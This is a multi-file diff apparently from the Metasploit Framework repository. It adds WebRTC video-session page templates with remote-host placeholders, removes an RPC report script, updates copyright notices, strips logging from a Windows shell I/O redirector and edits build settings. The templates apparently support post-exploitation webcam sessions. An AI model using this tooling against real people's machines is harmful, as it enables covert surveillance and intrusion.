+		navigator.getUserMedia(hints,function(stream) {
+			var video = document.createElement('video');
+			video.src = URL.createObjectURL(stream);
+
+			peer.onStreamAdded({
+				mediaElement: video,
+				userid: 'self',
+				stream: stream
+			});
+						
+			callback(stream);
+		});
+	}
+</script>
+</head>
+<body>
+
+<div class="container">
+	<div class="windowa" id="windowa">
+	</div>
+	<div class="windowb" id="windowb">
+	</div>
+	<div class="windowc">
+		<b>Session status (=RHOST=):</b><p></p>
+		<span id="message"></span>
+	</div>
+</div>
+<div class="footer">
+	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+</div>
+</body>
+</html>
@@ -0,0 +1,363 @@
+// Muaz Khan     - https://github.com/muaz-khan
+// MIT License   - https://www.webrtc-experiment.com/licence/
+// Documentation - https://github.com/muaz-khan/WebRTC-Experiment/tree/master/websocket
+
+(function () {
+
+    window.PeerConnection = function (socketURL, userid) {
+        this.userid = userid || getToken();
+        this.peers = {};
+
+        if (!socketURL) throw 'Socket-URL is mandatory.';
+
+        new Signaler(this, socketURL);
+        
+        this.addStream = function(stream) { 
+            this.MediaStream = stream;
+        };
+    };
+
+    function Signaler(root, socketURL) {
+        var self = this;
+
+        root.startBroadcasting = function () {
+            if(!root.MediaStream) throw 'Offerer must have media stream.';
+            
+            (function transmit() {
+                socket.send({
+                    userid: root.userid,
+                    broadcasting: true
+                });
+                !self.participantFound &&
+                    !self.stopBroadcasting &&
+                        setTimeout(transmit, 3000);
+            })();
+        };
+
+        root.sendParticipationRequest = function (userid) {
+            socket.send({
+                participationRequest: true,
+                userid: root.userid,
+                to: userid
+            });
+        };
+
+        // if someone shared SDP
+        this.onsdp = function (message) {
+            var sdp = message.sdp;
+
+            if (sdp.type == 'offer') {
+                root.peers[message.userid] = Answer.createAnswer(merge(options, {
+                    MediaStream: root.MediaStream,
+                    sdp: sdp
+                }));
+            }
+
+            if (sdp.type == 'answer') {
+                root.peers[message.userid].setRemoteDescription(sdp);
+            }
+        };
+
+        root.acceptRequest = function (userid) {
+            root.peers[userid] = Offer.createOffer(merge(options, {
+                MediaStream: root.MediaStream
+            }));
+        };
+
+        var candidates = [];
+        // if someone shared ICE
+        this.onice = function (message) {
+            var peer = root.peers[message.userid];
+            if (peer) {
+                peer.addIceCandidate(message.candidate);
+                for (var i = 0; i < candidates.length; i++) {
+                    peer.addIceCandidate(candidates[i]);
+                }
+                candidates = [];
+            } else candidates.push(candidates);
+        };
+
+        // it is passed over Offer/Answer objects for reusability
+        var options = {
+            onsdp: function (sdp) {
+                socket.send({
+                    userid: root.userid,
+                    sdp: sdp,
+                    to: root.participant
+                });
+            },
+            onicecandidate: function (candidate) {
+                socket.send({
+                    userid: root.userid,
+                    candidate: candidate,
+                    to: root.participant
+                });
+            },
+            onStreamAdded: function (stream) {
+                console.debug('onStreamAdded', '>>>>>>', stream);
+
+                stream.onended = function () {
+                    if (root.onStreamEnded) root.onStreamEnded(streamObject);
+                };
+
+                var mediaElement = document.createElement('video');
+                mediaElement.id = root.participant;
+                mediaElement[isFirefox ? 'mozSrcObject' : 'src'] = isFirefox ? stream : window.webkitURL.createObjectURL(stream);
+                mediaElement.autoplay = true;
+                mediaElement.controls = true;
+                mediaElement.play();
+
+                var streamObject = {
+                    mediaElement: mediaElement,
+                    stream: stream,
+                    userid: root.participant,
+                    type: 'remote'
+                };
+
+                function afterRemoteStreamStartedFlowing() {
+                    if (!root.onStreamAdded) return;
+                    root.onStreamAdded(streamObject);
+                }
+
+                afterRemoteStreamStartedFlowing();
+            }
+        };
+
+        function closePeerConnections() {
+            self.stopBroadcasting = true;
+            if (root.MediaStream) root.MediaStream.stop();
+
+            for (var userid in root.peers) {
+                root.peers[userid].peer.close();
+            }
+            root.peers = {};
+        }
+
+        root.close = function () {
+            socket.send({
+                userLeft: true,
+                userid: root.userid,
+                to: root.participant
+            });
+            closePeerConnections();
+        };
+
+        window.onbeforeunload = function () {
+            root.close();
+        };
+
+        window.onkeyup = function (e) {
+            if (e.keyCode == 116)
+                root.close();
+        };
+        
+        function onmessage(e) {
+            var message = JSON.parse(e.data);
+
+            if (message.userid == root.userid) return;
+            root.participant = message.userid;
+
+            // for pretty logging
+            console.debug(JSON.stringify(message, function (key, value) {
+                if (value && value.sdp) {
+                    console.log(value.sdp.type, '---', value.sdp.sdp);
+                    return '';
+                } else return value;
+            }, '---'));
+
+            // if someone shared SDP
+            if (message.sdp && message.to == root.userid) {
+                self.onsdp(message);
+            }
+
+            // if someone shared ICE
+            if (message.candidate && message.to == root.userid) {
+                self.onice(message);
+            }
+
+            // if someone sent participation request
+            if (message.participationRequest && message.to == root.userid) {
+                self.participantFound = true;
+
+                if (root.onParticipationRequest) {
+                    root.onParticipationRequest(message.userid);
+                } else root.acceptRequest(message.userid);
+            }
+
+            // if someone is broadcasting himself!
+            if (message.broadcasting && root.onUserFound) {
+                root.onUserFound(message.userid);
+            }
+
+            if (message.userLeft && message.to == root.userid) {
+                closePeerConnections();
+            }
+        }
+
+        var socket = socketURL;
+        if(typeof socketURL == 'string') {
+            socket = new WebSocket(socketURL);
+            socket.push = socket.send;
+            socket.send = function (data) {
+                socket.push(JSON.stringify(data));
+            };
+
+            socket.onopen = function () {
+                console.log('websocket connection opened.');
+            };
+        }
+        socket.onmessage = onmessage;
+    }
+
+    var RTCPeerConnection = window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
+    var RTCSessionDescription = window.mozRTCSessionDescription || window.RTCSessionDescription;
+    var RTCIceCandidate = window.mozRTCIceCandidate || window.RTCIceCandidate;
+
+    navigator.getUserMedia = navigator.mozGetUserMedia || navigator.webkitGetUserMedia;
+    window.URL = window.webkitURL || window.URL;
+
+    var isFirefox = !!navigator.mozGetUserMedia;
+    var isChrome = !!navigator.webkitGetUserMedia;
+
+    var STUN = {
+        url: isChrome ? 'stun:stun.l.google.com:19302' : 'stun:23.21.150.121'
+    };
+
+    var TURN = {
+        url: 'turn:homeo@turn.bistri.com:80',
+        credential: 'homeo'
+    };
+
+    var iceServers = {
+        iceServers: [STUN]
+    };
+
+    if (isChrome) {
+        if (parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2]) >= 28)
+            TURN = {
+                url: 'turn:turn.bistri.com:80',
+                credential: 'homeo',
+                username: 'homeo'
+            };
+
+        iceServers.iceServers = [STUN, TURN];
+    }
+
+    var optionalArgument = {
+        optional: [{
+            DtlsSrtpKeyAgreement: true
+        }]
+    };
+
+    var offerAnswerConstraints = {
+        optional: [],
+        mandatory: {
+            OfferToReceiveAudio: true,
+            OfferToReceiveVideo: true
+        }
+    };
+
+    function getToken() {
+        return Math.round(Math.random() * 9999999999) + 9999999999;
+    }
+    
+    function onSdpError() {}
+
+    // var offer = Offer.createOffer(config);
+    // offer.setRemoteDescription(sdp);
+    // offer.addIceCandidate(candidate);
+    var Offer = {
+        createOffer: function (config) {
+            var peer = new RTCPeerConnection(iceServers, optionalArgument);
+
+            if (config.MediaStream) peer.addStream(config.MediaStream);
+            peer.onaddstream = function (event) {
+                config.onStreamAdded(event.stream);
+            };
+
+            peer.onicecandidate = function (event) {
+                if (event.candidate)
+                    config.onicecandidate(event.candidate);
+            };
+
+            peer.createOffer(function (sdp) {
+                peer.setLocalDescription(sdp);
+                config.onsdp(sdp);
+            }, onSdpError, offerAnswerConstraints);
+
+            this.peer = peer;
+
+            return this;
+        },
+        setRemoteDescription: function (sdp) {
+            this.peer.setRemoteDescription(new RTCSessionDescription(sdp));
+        },
+        addIceCandidate: function (candidate) {
+            this.peer.addIceCandidate(new RTCIceCandidate({
+                sdpMLineIndex: candidate.sdpMLineIndex,
+                candidate: candidate.candidate
+            }));
+        }
+    };
+
+    // var answer = Answer.createAnswer(config);
+    // answer.setRemoteDescription(sdp);
+    // answer.addIceCandidate(candidate);
+    var Answer = {
+        createAnswer: function (config) {
+            var peer = new RTCPeerConnection(iceServers, optionalArgument);
+
+            if (config.MediaStream) peer.addStream(config.MediaStream);
+            peer.onaddstream = function (event) {
+                config.onStreamAdded(event.stream);
+            };
+
+            peer.onicecandidate = function (event) {
+                if (event.candidate)
+                    config.onicecandidate(event.candidate);
+            };
+
+            peer.setRemoteDescription(new RTCSessionDescription(config.sdp));
+            peer.createAnswer(function (sdp) {
+                peer.setLocalDescription(sdp);
+                config.onsdp(sdp);
+            }, onSdpError, offerAnswerConstraints);
+
+            this.peer = peer;
+
+            return this;
+        },
+        addIceCandidate: function (candidate) {
+            this.peer.addIceCandidate(new RTCIceCandidate({
+                sdpMLineIndex: candidate.sdpMLineIndex,
+                candidate: candidate.candidate
+            }));
+        }
+    };
+
+    function merge(mergein, mergeto) {
+        for (var t in mergeto) {
+            mergein[t] = mergeto[t];
+        }
+        return mergein;
+    }
+    
+    window.URL = window.webkitURL || window.URL;
+    navigator.getMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia;
+    navigator.getUserMedia = function(hints, onsuccess, onfailure) {
+        if(!hints) hints = {audio:true,video:true};
+        if(!onsuccess) throw 'Second argument is mandatory. navigator.getUserMedia(hints,onsuccess,onfailure)';
+        
+        navigator.getMedia(hints, _onsuccess, _onfailure);
+        
+        function _onsuccess(stream) {
+            onsuccess(stream);
+        }
+        
+        function _onfailure(e) {
+            if(onfailure) onfailure(e);
+            else throw Error('getUserMedia failed: ' + JSON.stringify(e, null, '\t'));
+        }
+    };
+    
+})();
@@ -0,0 +1,195 @@
+<html>
+<head>
+	<title>Video session</title>
+	<style type="text/css">
+		div.dot1 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 470;
+		}
+
+		div.dot2 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 505;
+		}
+
+		div.dot3 {
+			position: absolute;
+			width: 20px;
+			height: 20px;
+			margin: 30px auto 0;
+			border-radius: 50px;
+			background-color: red;
+			top: 150;
+			left: 540;
+		}
+
+		div.windowa {
+			height: 340px;
+			width: 420px;
+			border-radius: 15px;
+			-moz-border-raidus: 15px;
+			background-color: black;
+			position: absolute;
+			left: 20;
+			padding : 10px;
+			margin-left: auto;
+			margin-right: auto;
+			text-align: center;
+			vertical-align: middle;
+			color: white;
+		}
+
+		div.windowb {
+			height: 340px;
+			width: 420px;
+			border-radius: 15px;
+			-moz-border-raidus: 15px;
+			background-color: black;
+			position: absolute;
+			left: 570;
+			padding : 10px;
+			margin-left: auto;
+			margin-right: auto;
+			text-align: center;
+			vertical-align: middle;
+			color: white;
+		}
+
+		div.windowc {
+			position: absolute;
+			top: 400;
+			left: 60;
+			height: 50px;
+			width: 900px;
+			color: red;
+		}
+
+		div.footer {
+			position: fixed;
+			bottom: 0;
+			width: 100%;
+			padding: 10px;
+		}
+	</style>
+
+	<script src="api.js"> </script>
+	<script>
+		var channel = '=CHANNEL=';
+		var websocket = new WebSocket('ws://=SERVER=');
+
+		websocket.onopen = function() {
+			websocket.push(JSON.stringify({
+				open: true,
+				channel: channel
+			}));
+		};
+
+		websocket.push = websocket.send;
+		websocket.send = function(data) {
+			websocket.push(JSON.stringify({
+				data: data,
+				channel: channel
+			}));
+		};
+
+		var peer = new PeerConnection(websocket, '=OFFERERID=');
+
+		peer.onStreamAdded = function(e) {
+			var video = e.mediaElement;
+			video.setAttribute('width', 420);
+			video.setAttribute('height', 340);
+			video.setAttribute('controls', false);
+			video.volume = 0.5;
+
+			if (e.userid == 'self') {
+				document.getElementById("windowb").appendChild(video);
+			}
+			else {
+				document.getElementById("windowa").appendChild(video);
+				document.getElementById("message").innerHTML = "Session is now active.";
+			}
+
+			video.play();
+		};
+
+		peer.onStreamEnded = function(e) {
+			var video = e.mediaElement;
+			if (video) {
+				video.style.opacity = 0;
+				setTimeout(function() {
+					video.parentNode.removeChild(video);
+				}, 1000);
+			}
+			document.getElementById("message").innerHTML = "The video session has ended.";
+		};
+
+		window.onload = function() {
+			getUserMedia(function(stream) {
+				peer.addStream(stream);
+				peer.startBroadcasting();
+			});
+		};
+
+		function getUserMedia(callback) {
+			var hints = {audio:true,video:{
+				optional: [],
+				mandatory: {
+					minWidth: 1280,
+					minHeight: 720,
+					maxWidth: 1920,
+					maxHeight: 1080,
+					minAspectRatio: 1.77
+				}
+			}};
+
+			navigator.getUserMedia(hints,function(stream) {
+				var video = document.createElement('video');
+				video.src = URL.createObjectURL(stream);
+				peer.onStreamAdded({
+					mediaElement: video,
+					userid: 'self',
+					stream: stream
+				});
+						
+				callback(stream);
+			});
+		}
+	</script>
+</head>
+<body>
+
+<div class="windowa" id="windowa">
+	<b>You peer</b>
+</div>
+
+<div class="dot1"></div>
+<div class="dot2"></div>
+<div class="dot3"></div>
+
+<div class="windowb" id="windowb">
+	<b>You</b>
+</div>
+
+<div class="windowc">
+	<b>Status:</b><p></p>
+	<span id="message">Waiting for your peer to join the video session...</span>
+</div>
+
+<div class="footer">
+	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+</div>
+
+</body>
+</html>
@@ -1,126 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'rubygems'
-require 'optparse'
-require 'msfrpc-client'
-require 'rex/ui'
-
-def usage(ropts)
-  $stderr.puts ropts
-
-  if @rpc and @rpc.token
-    wspaces = @rpc.call("pro.workspaces") rescue {}
-    if wspaces.keys.length > 0
-      $stderr.puts "Active Projects:"
-      wspaces.each_pair do |k,v|
-        $stderr.puts "\t#{k}"
-      end
-    end
-  end
-  $stderr.puts ""
-  exit(1)
-end
-
-opts  = {
-  :format => 'PDF'
-}
-
-parser = Msf::RPC::Client.option_parser(opts)
-
-parser.separator('Report Options:')
-parser.on("--format FORMAT") do |v|
-  opts[:format] = v.upcase
-end
-
-parser.on("--project PROJECT") do |v|
-  opts[:project] = v
-end
-
-parser.on("--output OUTFILE") do |v|
-  opts[:output] = v
-end
-
-parser.on("--help") do
-  $stderr.puts parser
-  exit(1)
-end
-parser.separator('')
-
-parser.parse!(ARGV)
-@rpc  = Msf::RPC::Client.new(opts)
-
-if not @rpc.token
-  $stderr.puts "Error: Invalid RPC server options specified"
-  $stderr.puts parser
-  exit(1)
-end
-
-project = opts[:project] || usage(parser)
-fname  = opts[:output]  || usage(parser)
-rtype  = opts[:format]
-user   = @rpc.call("pro.default_admin_user")['username']
-
-task = @rpc.call("pro.start_report", {
-      'DS_WHITELIST_HOSTS'        => "",
-      'DS_BLACKLIST_HOSTS'        => "",
-      'workspace'                 => project,
-      'username'                  => user,
-      'DS_MaskPasswords'          => false,
-      'DS_IncludeTaskLog'         => false,
-      'DS_JasperDisplaySession'   => true,
-      'DS_JasperDisplayCharts'    => true,
-      'DS_LootExcludeScreenshots' => false,
-      'DS_LootExcludePasswords'   => false,
-      'DS_JasperTemplate'         => "msfxv3.jrxml",
-      'DS_REPORT_TYPE'            => rtype.upcase,
-      'DS_UseJasper'              => true,
-      'DS_UseCustomReporting'     => true,
-      'DS_JasperProductName'      => "Metasploit Pro",
-      'DS_JasperDbEnv'            => "production",
-      'DS_JasperLogo'             => '',
-      'DS_JasperDisplaySections'  => "1,2,3,4,5,6,7,8",
-      'DS_EnablePCIReport'        => true,
-      'DS_EnableFISMAReport'      => true,
-      'DS_JasperDisplayWeb'       => true,
-})
-
-
-if not task['task_id']
-  $stderr.puts "[-] Error generating the report: #{task.inspect}"
-  exit(0)
-end
-
-puts "[*] Report is generating with Task ID #{task['task_id']}..."
-while true
-  select(nil, nil, nil, 0.50)
-  stat = @rpc.call("pro.task_status", task['task_id'])
-  if stat['status'] == 'invalid'
-    $stderr.puts "[-] Error checking task status"
-    exit(0)
-  end
-
-  info = stat[ task['task_id'] ]
-
-  if not info
-    $stderr.puts "[-] Error finding the task"
-    exit(0)
-  end
-
-  if info['status'] == "error"
-    $stderr.puts "[-] Error generating report: #{info['error']}"
-    exit(0)
-  end
-
-  break if info['progress'] == 100
-end
-
-report = @rpc.call('pro.report_download_by_task', task['task_id'])
-if report and report['data']
-  ::File.open(fname, "wb") do |fd|
-    fd.write(report['data'])
-  end
-  $stderr.puts "[-] Report saved to #{::File.expand_path(fname)}"
-else
-  $stderr.puts "[-] Error downloading report: #{report.inspect}"
-end
-
@@ -878,7 +878,7 @@ The Metasploit Framework is distributed under the modified-BSD license defined b

 {\footnotesize
 \begin{verbatim}
-Copyright (c) 2008, Rapid7 LLC
+Copyright (c) 2008, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -891,7 +891,7 @@ are permitted provided that the following conditions are met:
 	  this list of conditions and the following disclaimer in the documentation
 	  and/or other materials provided with the distribution.

-    * Neither the name of Rapid7 LLC nor the names of its contributors 
+    * Neither the name of Rapid7, Inc. nor the names of its contributors 
 	  may be used to endorse or promote products derived from this software 
 	  without specific prior written permission.

@@ -1,6 +1,6 @@
 /*
 	ruby-kissfft: a simple ruby module embedding the Kiss FFT library
-	Copyright (C) 2009-2010 Rapid7 LLC - H D Moore <hdm[at]metasploit.com>
+	Copyright (C) 2009-2010 Rapid7, Inc - H D Moore <hdm[at]metasploit.com>
 	
 	Derived from "psdpng.c" from the KissFFT tools directory
 	Copyright (C) 2003-2006 Mark Borgerding
@@ -33,7 +33,7 @@
 */

 /*	
-	All ruby-lorcon/rubyisms are by Rapid7 LLC (C) 2006-2007
+	All ruby-lorcon/rubyisms are by Rapid7, Inc (C) 2006-2007
 		http://metasploit.com/ - msfdev[at]metasploit.com
 */

@@ -37,7 +37,7 @@
 */

 /*	
-	All ruby-lorcon/rubyisms are by Metasploit LLC (C) 2006-2007
+	All ruby-lorcon/rubyisms are by Rapid7, Inc. (C) 2006-2007
 		http://metasploit.com/ - msfdev[at]metasploit.com
 */

@@ -1,4 +1,4 @@
-/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
+/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */

 var oFso = new ActiveXObject("Scripting.FileSystemObject");
 var oShl = new ActiveXObject("WScript.Shell");
@@ -1,4 +1,4 @@
-/* DLLHijackAuditKit (C) 2010 Rapid7 LLC */
+/* DLLHijackAuditKit (C) 2010 Rapid7, Inc */

 function print_status(msg) {
 	try {
@@ -8,46 +8,6 @@
 #include <windows.h>
 #include <WinIOCtl.h>

-/*************************************************************************************************/
-/*************************************************************************************************/
-/*************************************************************************************************/
-
-std::wstring CError::Format( DWORD ErrorCode ) 
-{
-	return Format( ErrorCode, NULL, NULL );
-}
-
-std::wstring CError::Format(DWORD ErrorCode, const TCHAR *Title, const TCHAR *API) 
-{
-   LPVOID lpvMessageBuffer;
-
-   FormatMessage(
-			FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM,
-			NULL, ErrorCode,
-			MAKELANGID(LANG_ENGLISH, SUBLANG_DEFAULT),
-			(LPTSTR)&lpvMessageBuffer, 0, NULL);
-
-   std::wstring result;
-
-	std::wostringstream es(TEXT(""));
-	es << ErrorCode;
-
-	if ( Title )
-		{ result.append( Title ); result.append( TEXT("\n") ); }
-	else
-		{ result.append( TEXT("ERROR") ); result.append( TEXT("\n") ); }
-
-	if ( API )
-	{ result.append( TEXT("API        = ") );result.append( API ); result.append( TEXT("\n") ); }
-	  result.append( TEXT("error code = ") );result.append( es.str() );result.append( TEXT("\n") );
-	if( lpvMessageBuffer )
-	{ result.append( TEXT("message    = ") );result.append( (TCHAR *)lpvMessageBuffer );result.append( TEXT("\n") ); }
-
-	if ( lpvMessageBuffer )
-	{ LocalFree(lpvMessageBuffer); }
-
-   return result;
-}

 /*************************************************************************************************/
 /*************************************************************************************************/
@@ -142,90 +102,3 @@ CInterprocessStorage::~CInterprocessStorage()
 	CloseHandle( _hMapping );
 }

-/*************************************************************************************************/
-/*************************************************************************************************/
-/*************************************************************************************************/
-
-std::wstring CLogger::GetPath()
-{
-	std::wstring path;
-
-	TCHAR buffer[MAX_PATH];
-	if ( GetTempPath( MAX_PATH, buffer ) )
-	{
-		path.assign( buffer );
-		path.append( TEXT("w7e.log") );
-	}
-
-	return path;
-}
-
-void CLogger::Reset()
-{
-	DeleteFile( GetPath().c_str() );
-}
-
-void CLogger::LogLine( std::wstring& Text )
-{
-	std::wstring tmp( Text.c_str() );
-	tmp.append( TEXT("\n") );
-	Log( tmp );
-}
-
-void CLogger::LogLine( )
-{
-	Log( TEXT("\n") );
-}
-
-void CLogger::LogLine( const TCHAR *Text )
-{
-	if ( Text )
-		LogLine( std::wstring( Text ) );
-}
-
-void CLogger::Log( const TCHAR Char )
-{
-	std::wstring tmp;
-	tmp.append( &Char, 1 );
-	Log( tmp );
-}
-
-void CLogger::Log( const TCHAR *Text )
-{
-	if ( Text )
-		Log( std::wstring( Text ) );
-}
-
-void CLogger::Log( std::wstring& Text )
-{
-	TCHAR buffer[MAX_PATH];
-	//
-	//	We have to check it every time to be reflective if user created this file 
-	//	while program was runnig.
-	//
-	if ( GetModuleFileName( NULL, buffer, MAX_PATH ) )
-	{
-		std::wstring dbg( buffer );
-		dbg.append( TEXT(".debug") );
-		HANDLE hdbg =  CreateFile( dbg.c_str(), FILE_READ_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
-		if ( INVALID_HANDLE_VALUE == hdbg )
-			return;
-
-		CloseHandle( hdbg );
-	}
-
-	HANDLE mutex = CreateMutex( NULL, FALSE, TEXT("CLoggerSync") );
-	if ( mutex ) WaitForSingleObject( mutex , INFINITE );
-		HANDLE hFile = CreateFile( GetPath().c_str(), FILE_ALL_ACCESS, 0, NULL, OPEN_ALWAYS, FILE_FLAG_WRITE_THROUGH, NULL );
-		if( INVALID_HANDLE_VALUE != hFile )
-		{
-			SetFilePointer( hFile, 0, NULL, FILE_END );
-
-			DWORD written;
-			WriteFile( hFile, Text.data(), Text.size() * sizeof(TCHAR), &written, NULL );
-
-			CloseHandle( hFile );
-		}
-	if ( mutex ) ReleaseMutex( mutex );
-	if ( mutex ) CloseHandle( mutex );
-}
@@ -13,9 +13,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
 	assert( Parameter );
 	TRedirectorPair *pair = reinterpret_cast<TRedirectorPair*>( Parameter );

-	CLogger::Log( TEXT("Hello redirector thread: ") );
-	CLogger::LogLine( pair->Name );
-
 	CHAR read_buff[2];
 	DWORD nBytesRead,nBytesWrote;

@@ -25,11 +22,7 @@ DWORD WINAPI Redirector( LPVOID Parameter )
 	{
 		if( ! ReadFile( pair->Source, read_buff, 1, &nBytesRead, NULL) )
 		{
-			CLogger::LogLine( 
-				CError::Format( 
-					GetLastError(), 
-					pair->Name.c_str(), 
-					TEXT("ReadFile") ) );
+			
 			error = true && (!pair->KeepAlive);
 			break;
 		}
@@ -67,11 +60,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )

 				if ( ! WriteConsoleInput( pair->Destination, &inp, 1, &nBytesWrote) )
 				{
-					CLogger::LogLine( 
-						CError::Format( 
-							GetLastError(), 
-							pair->Name.c_str(), 
-							TEXT("WriteConsoleInput") ) );
 					error = true && (!pair->KeepAlive);
 					break;
 				}
@@ -80,11 +68,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
 			{
 				if ( ! WriteFile( pair->Destination, &read_buff[i], 1, &nBytesWrote, NULL) )
 				{
-					CLogger::LogLine( 
-						CError::Format( 
-							GetLastError(), 
-							pair->Name.c_str(), 
-							TEXT("WriteFile") ) );
 					error = true && (!pair->KeepAlive);
 					break;
 				}
@@ -92,8 +75,6 @@ DWORD WINAPI Redirector( LPVOID Parameter )
 		}
 	}

-	CLogger::Log( TEXT("Bye redirector thread: ") );
-	CLogger::LogLine( pair->Name );
 	return EXIT_SUCCESS;
 }

@@ -20,7 +20,6 @@

 int _tmain(int argc, _TCHAR* argv[])
 {
-	CLogger::LogLine(TEXT("TIOR: Hello"));

 	TRedirectorPair in = {0};
 	in.Source = CreateFile( STDIn_PIPE, FILE_ALL_ACCESS, 0, NULL, OPEN_EXISTING, 0, 0);
@@ -79,9 +78,6 @@ int _tmain(int argc, _TCHAR* argv[])
 	CInterprocessStorage::GetString( TEXT("w7e_TIORArgs"), args );
 	CInterprocessStorage::GetString( TEXT("w7e_TIORDir"), dir );

-	CLogger::LogLine(TEXT("TIOR: shell="));	CLogger::LogLine(shell);
-	CLogger::LogLine(TEXT("TIOR: args="));	CLogger::LogLine(args);
-	CLogger::LogLine(TEXT("TIOR: dir="));	CLogger::LogLine(dir);

 	STARTUPINFO si = {0};si.cb = sizeof(si);
 	PROCESS_INFORMATION pi = {0};
@@ -100,11 +96,6 @@ int _tmain(int argc, _TCHAR* argv[])

 	if ( ! created )
 	{
-		CLogger::LogLine(
-			CError::Format(
-				GetLastError(), 
-				TEXT("TIOR: Unable to create child process"), 
-				TEXT("CreateProcess")));

 		return EXIT_FAILURE;
 	}
@@ -113,14 +104,12 @@ int _tmain(int argc, _TCHAR* argv[])
 		CloseHandle( pi.hThread );
 	}

-	CLogger::LogLine(TEXT("TIOR: Shell has been started. Waiting..."));
 	HANDLE waiters[4] = {pi.hProcess, in.Thread, out.Thread, err.Thread} ;
 	//
 	//	Waiting for eny handle to be freed. 
 	//	Either some IO thread will die or process will be oevered.
 	//
 	WaitForMultipleObjects( 4, waiters, FALSE, INFINITE );
-	CLogger::LogLine(TEXT("TIOR: Ensure that we processed all data in pipes"));

 	//
 	//	Even if process was overed, we need to be sure that we readed all data from the redirected pipe.
@@ -132,11 +121,9 @@ int _tmain(int argc, _TCHAR* argv[])
 	//	Dont forget to close child process. We need to be sure, if user terminated app which
 	//	reads our redirected data, we terminate the target child app.
 	//
-	CLogger::LogLine(TEXT("TIOR: Killing child process"));
 	TerminateProcess( pi.hProcess, EXIT_FAILURE );
 	CloseHandle( pi.hProcess );

-	CLogger::LogLine(TEXT("TIOR: Exit"));

 	//
 	//	I will not close any handles here - system will terminate and close all by it self.
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
@@ -28,23 +28,27 @@
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
@@ -63,26 +67,31 @@
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <TargetName>$(ProjectName)32</TargetName>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-    <TargetName>$(ProjectName)64</TargetName>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <LinkIncremental>false</LinkIncremental>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)32</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
    <GenerateManifest>false</GenerateManifest>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
-    <TargetName>$(ProjectName)64</TargetName>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
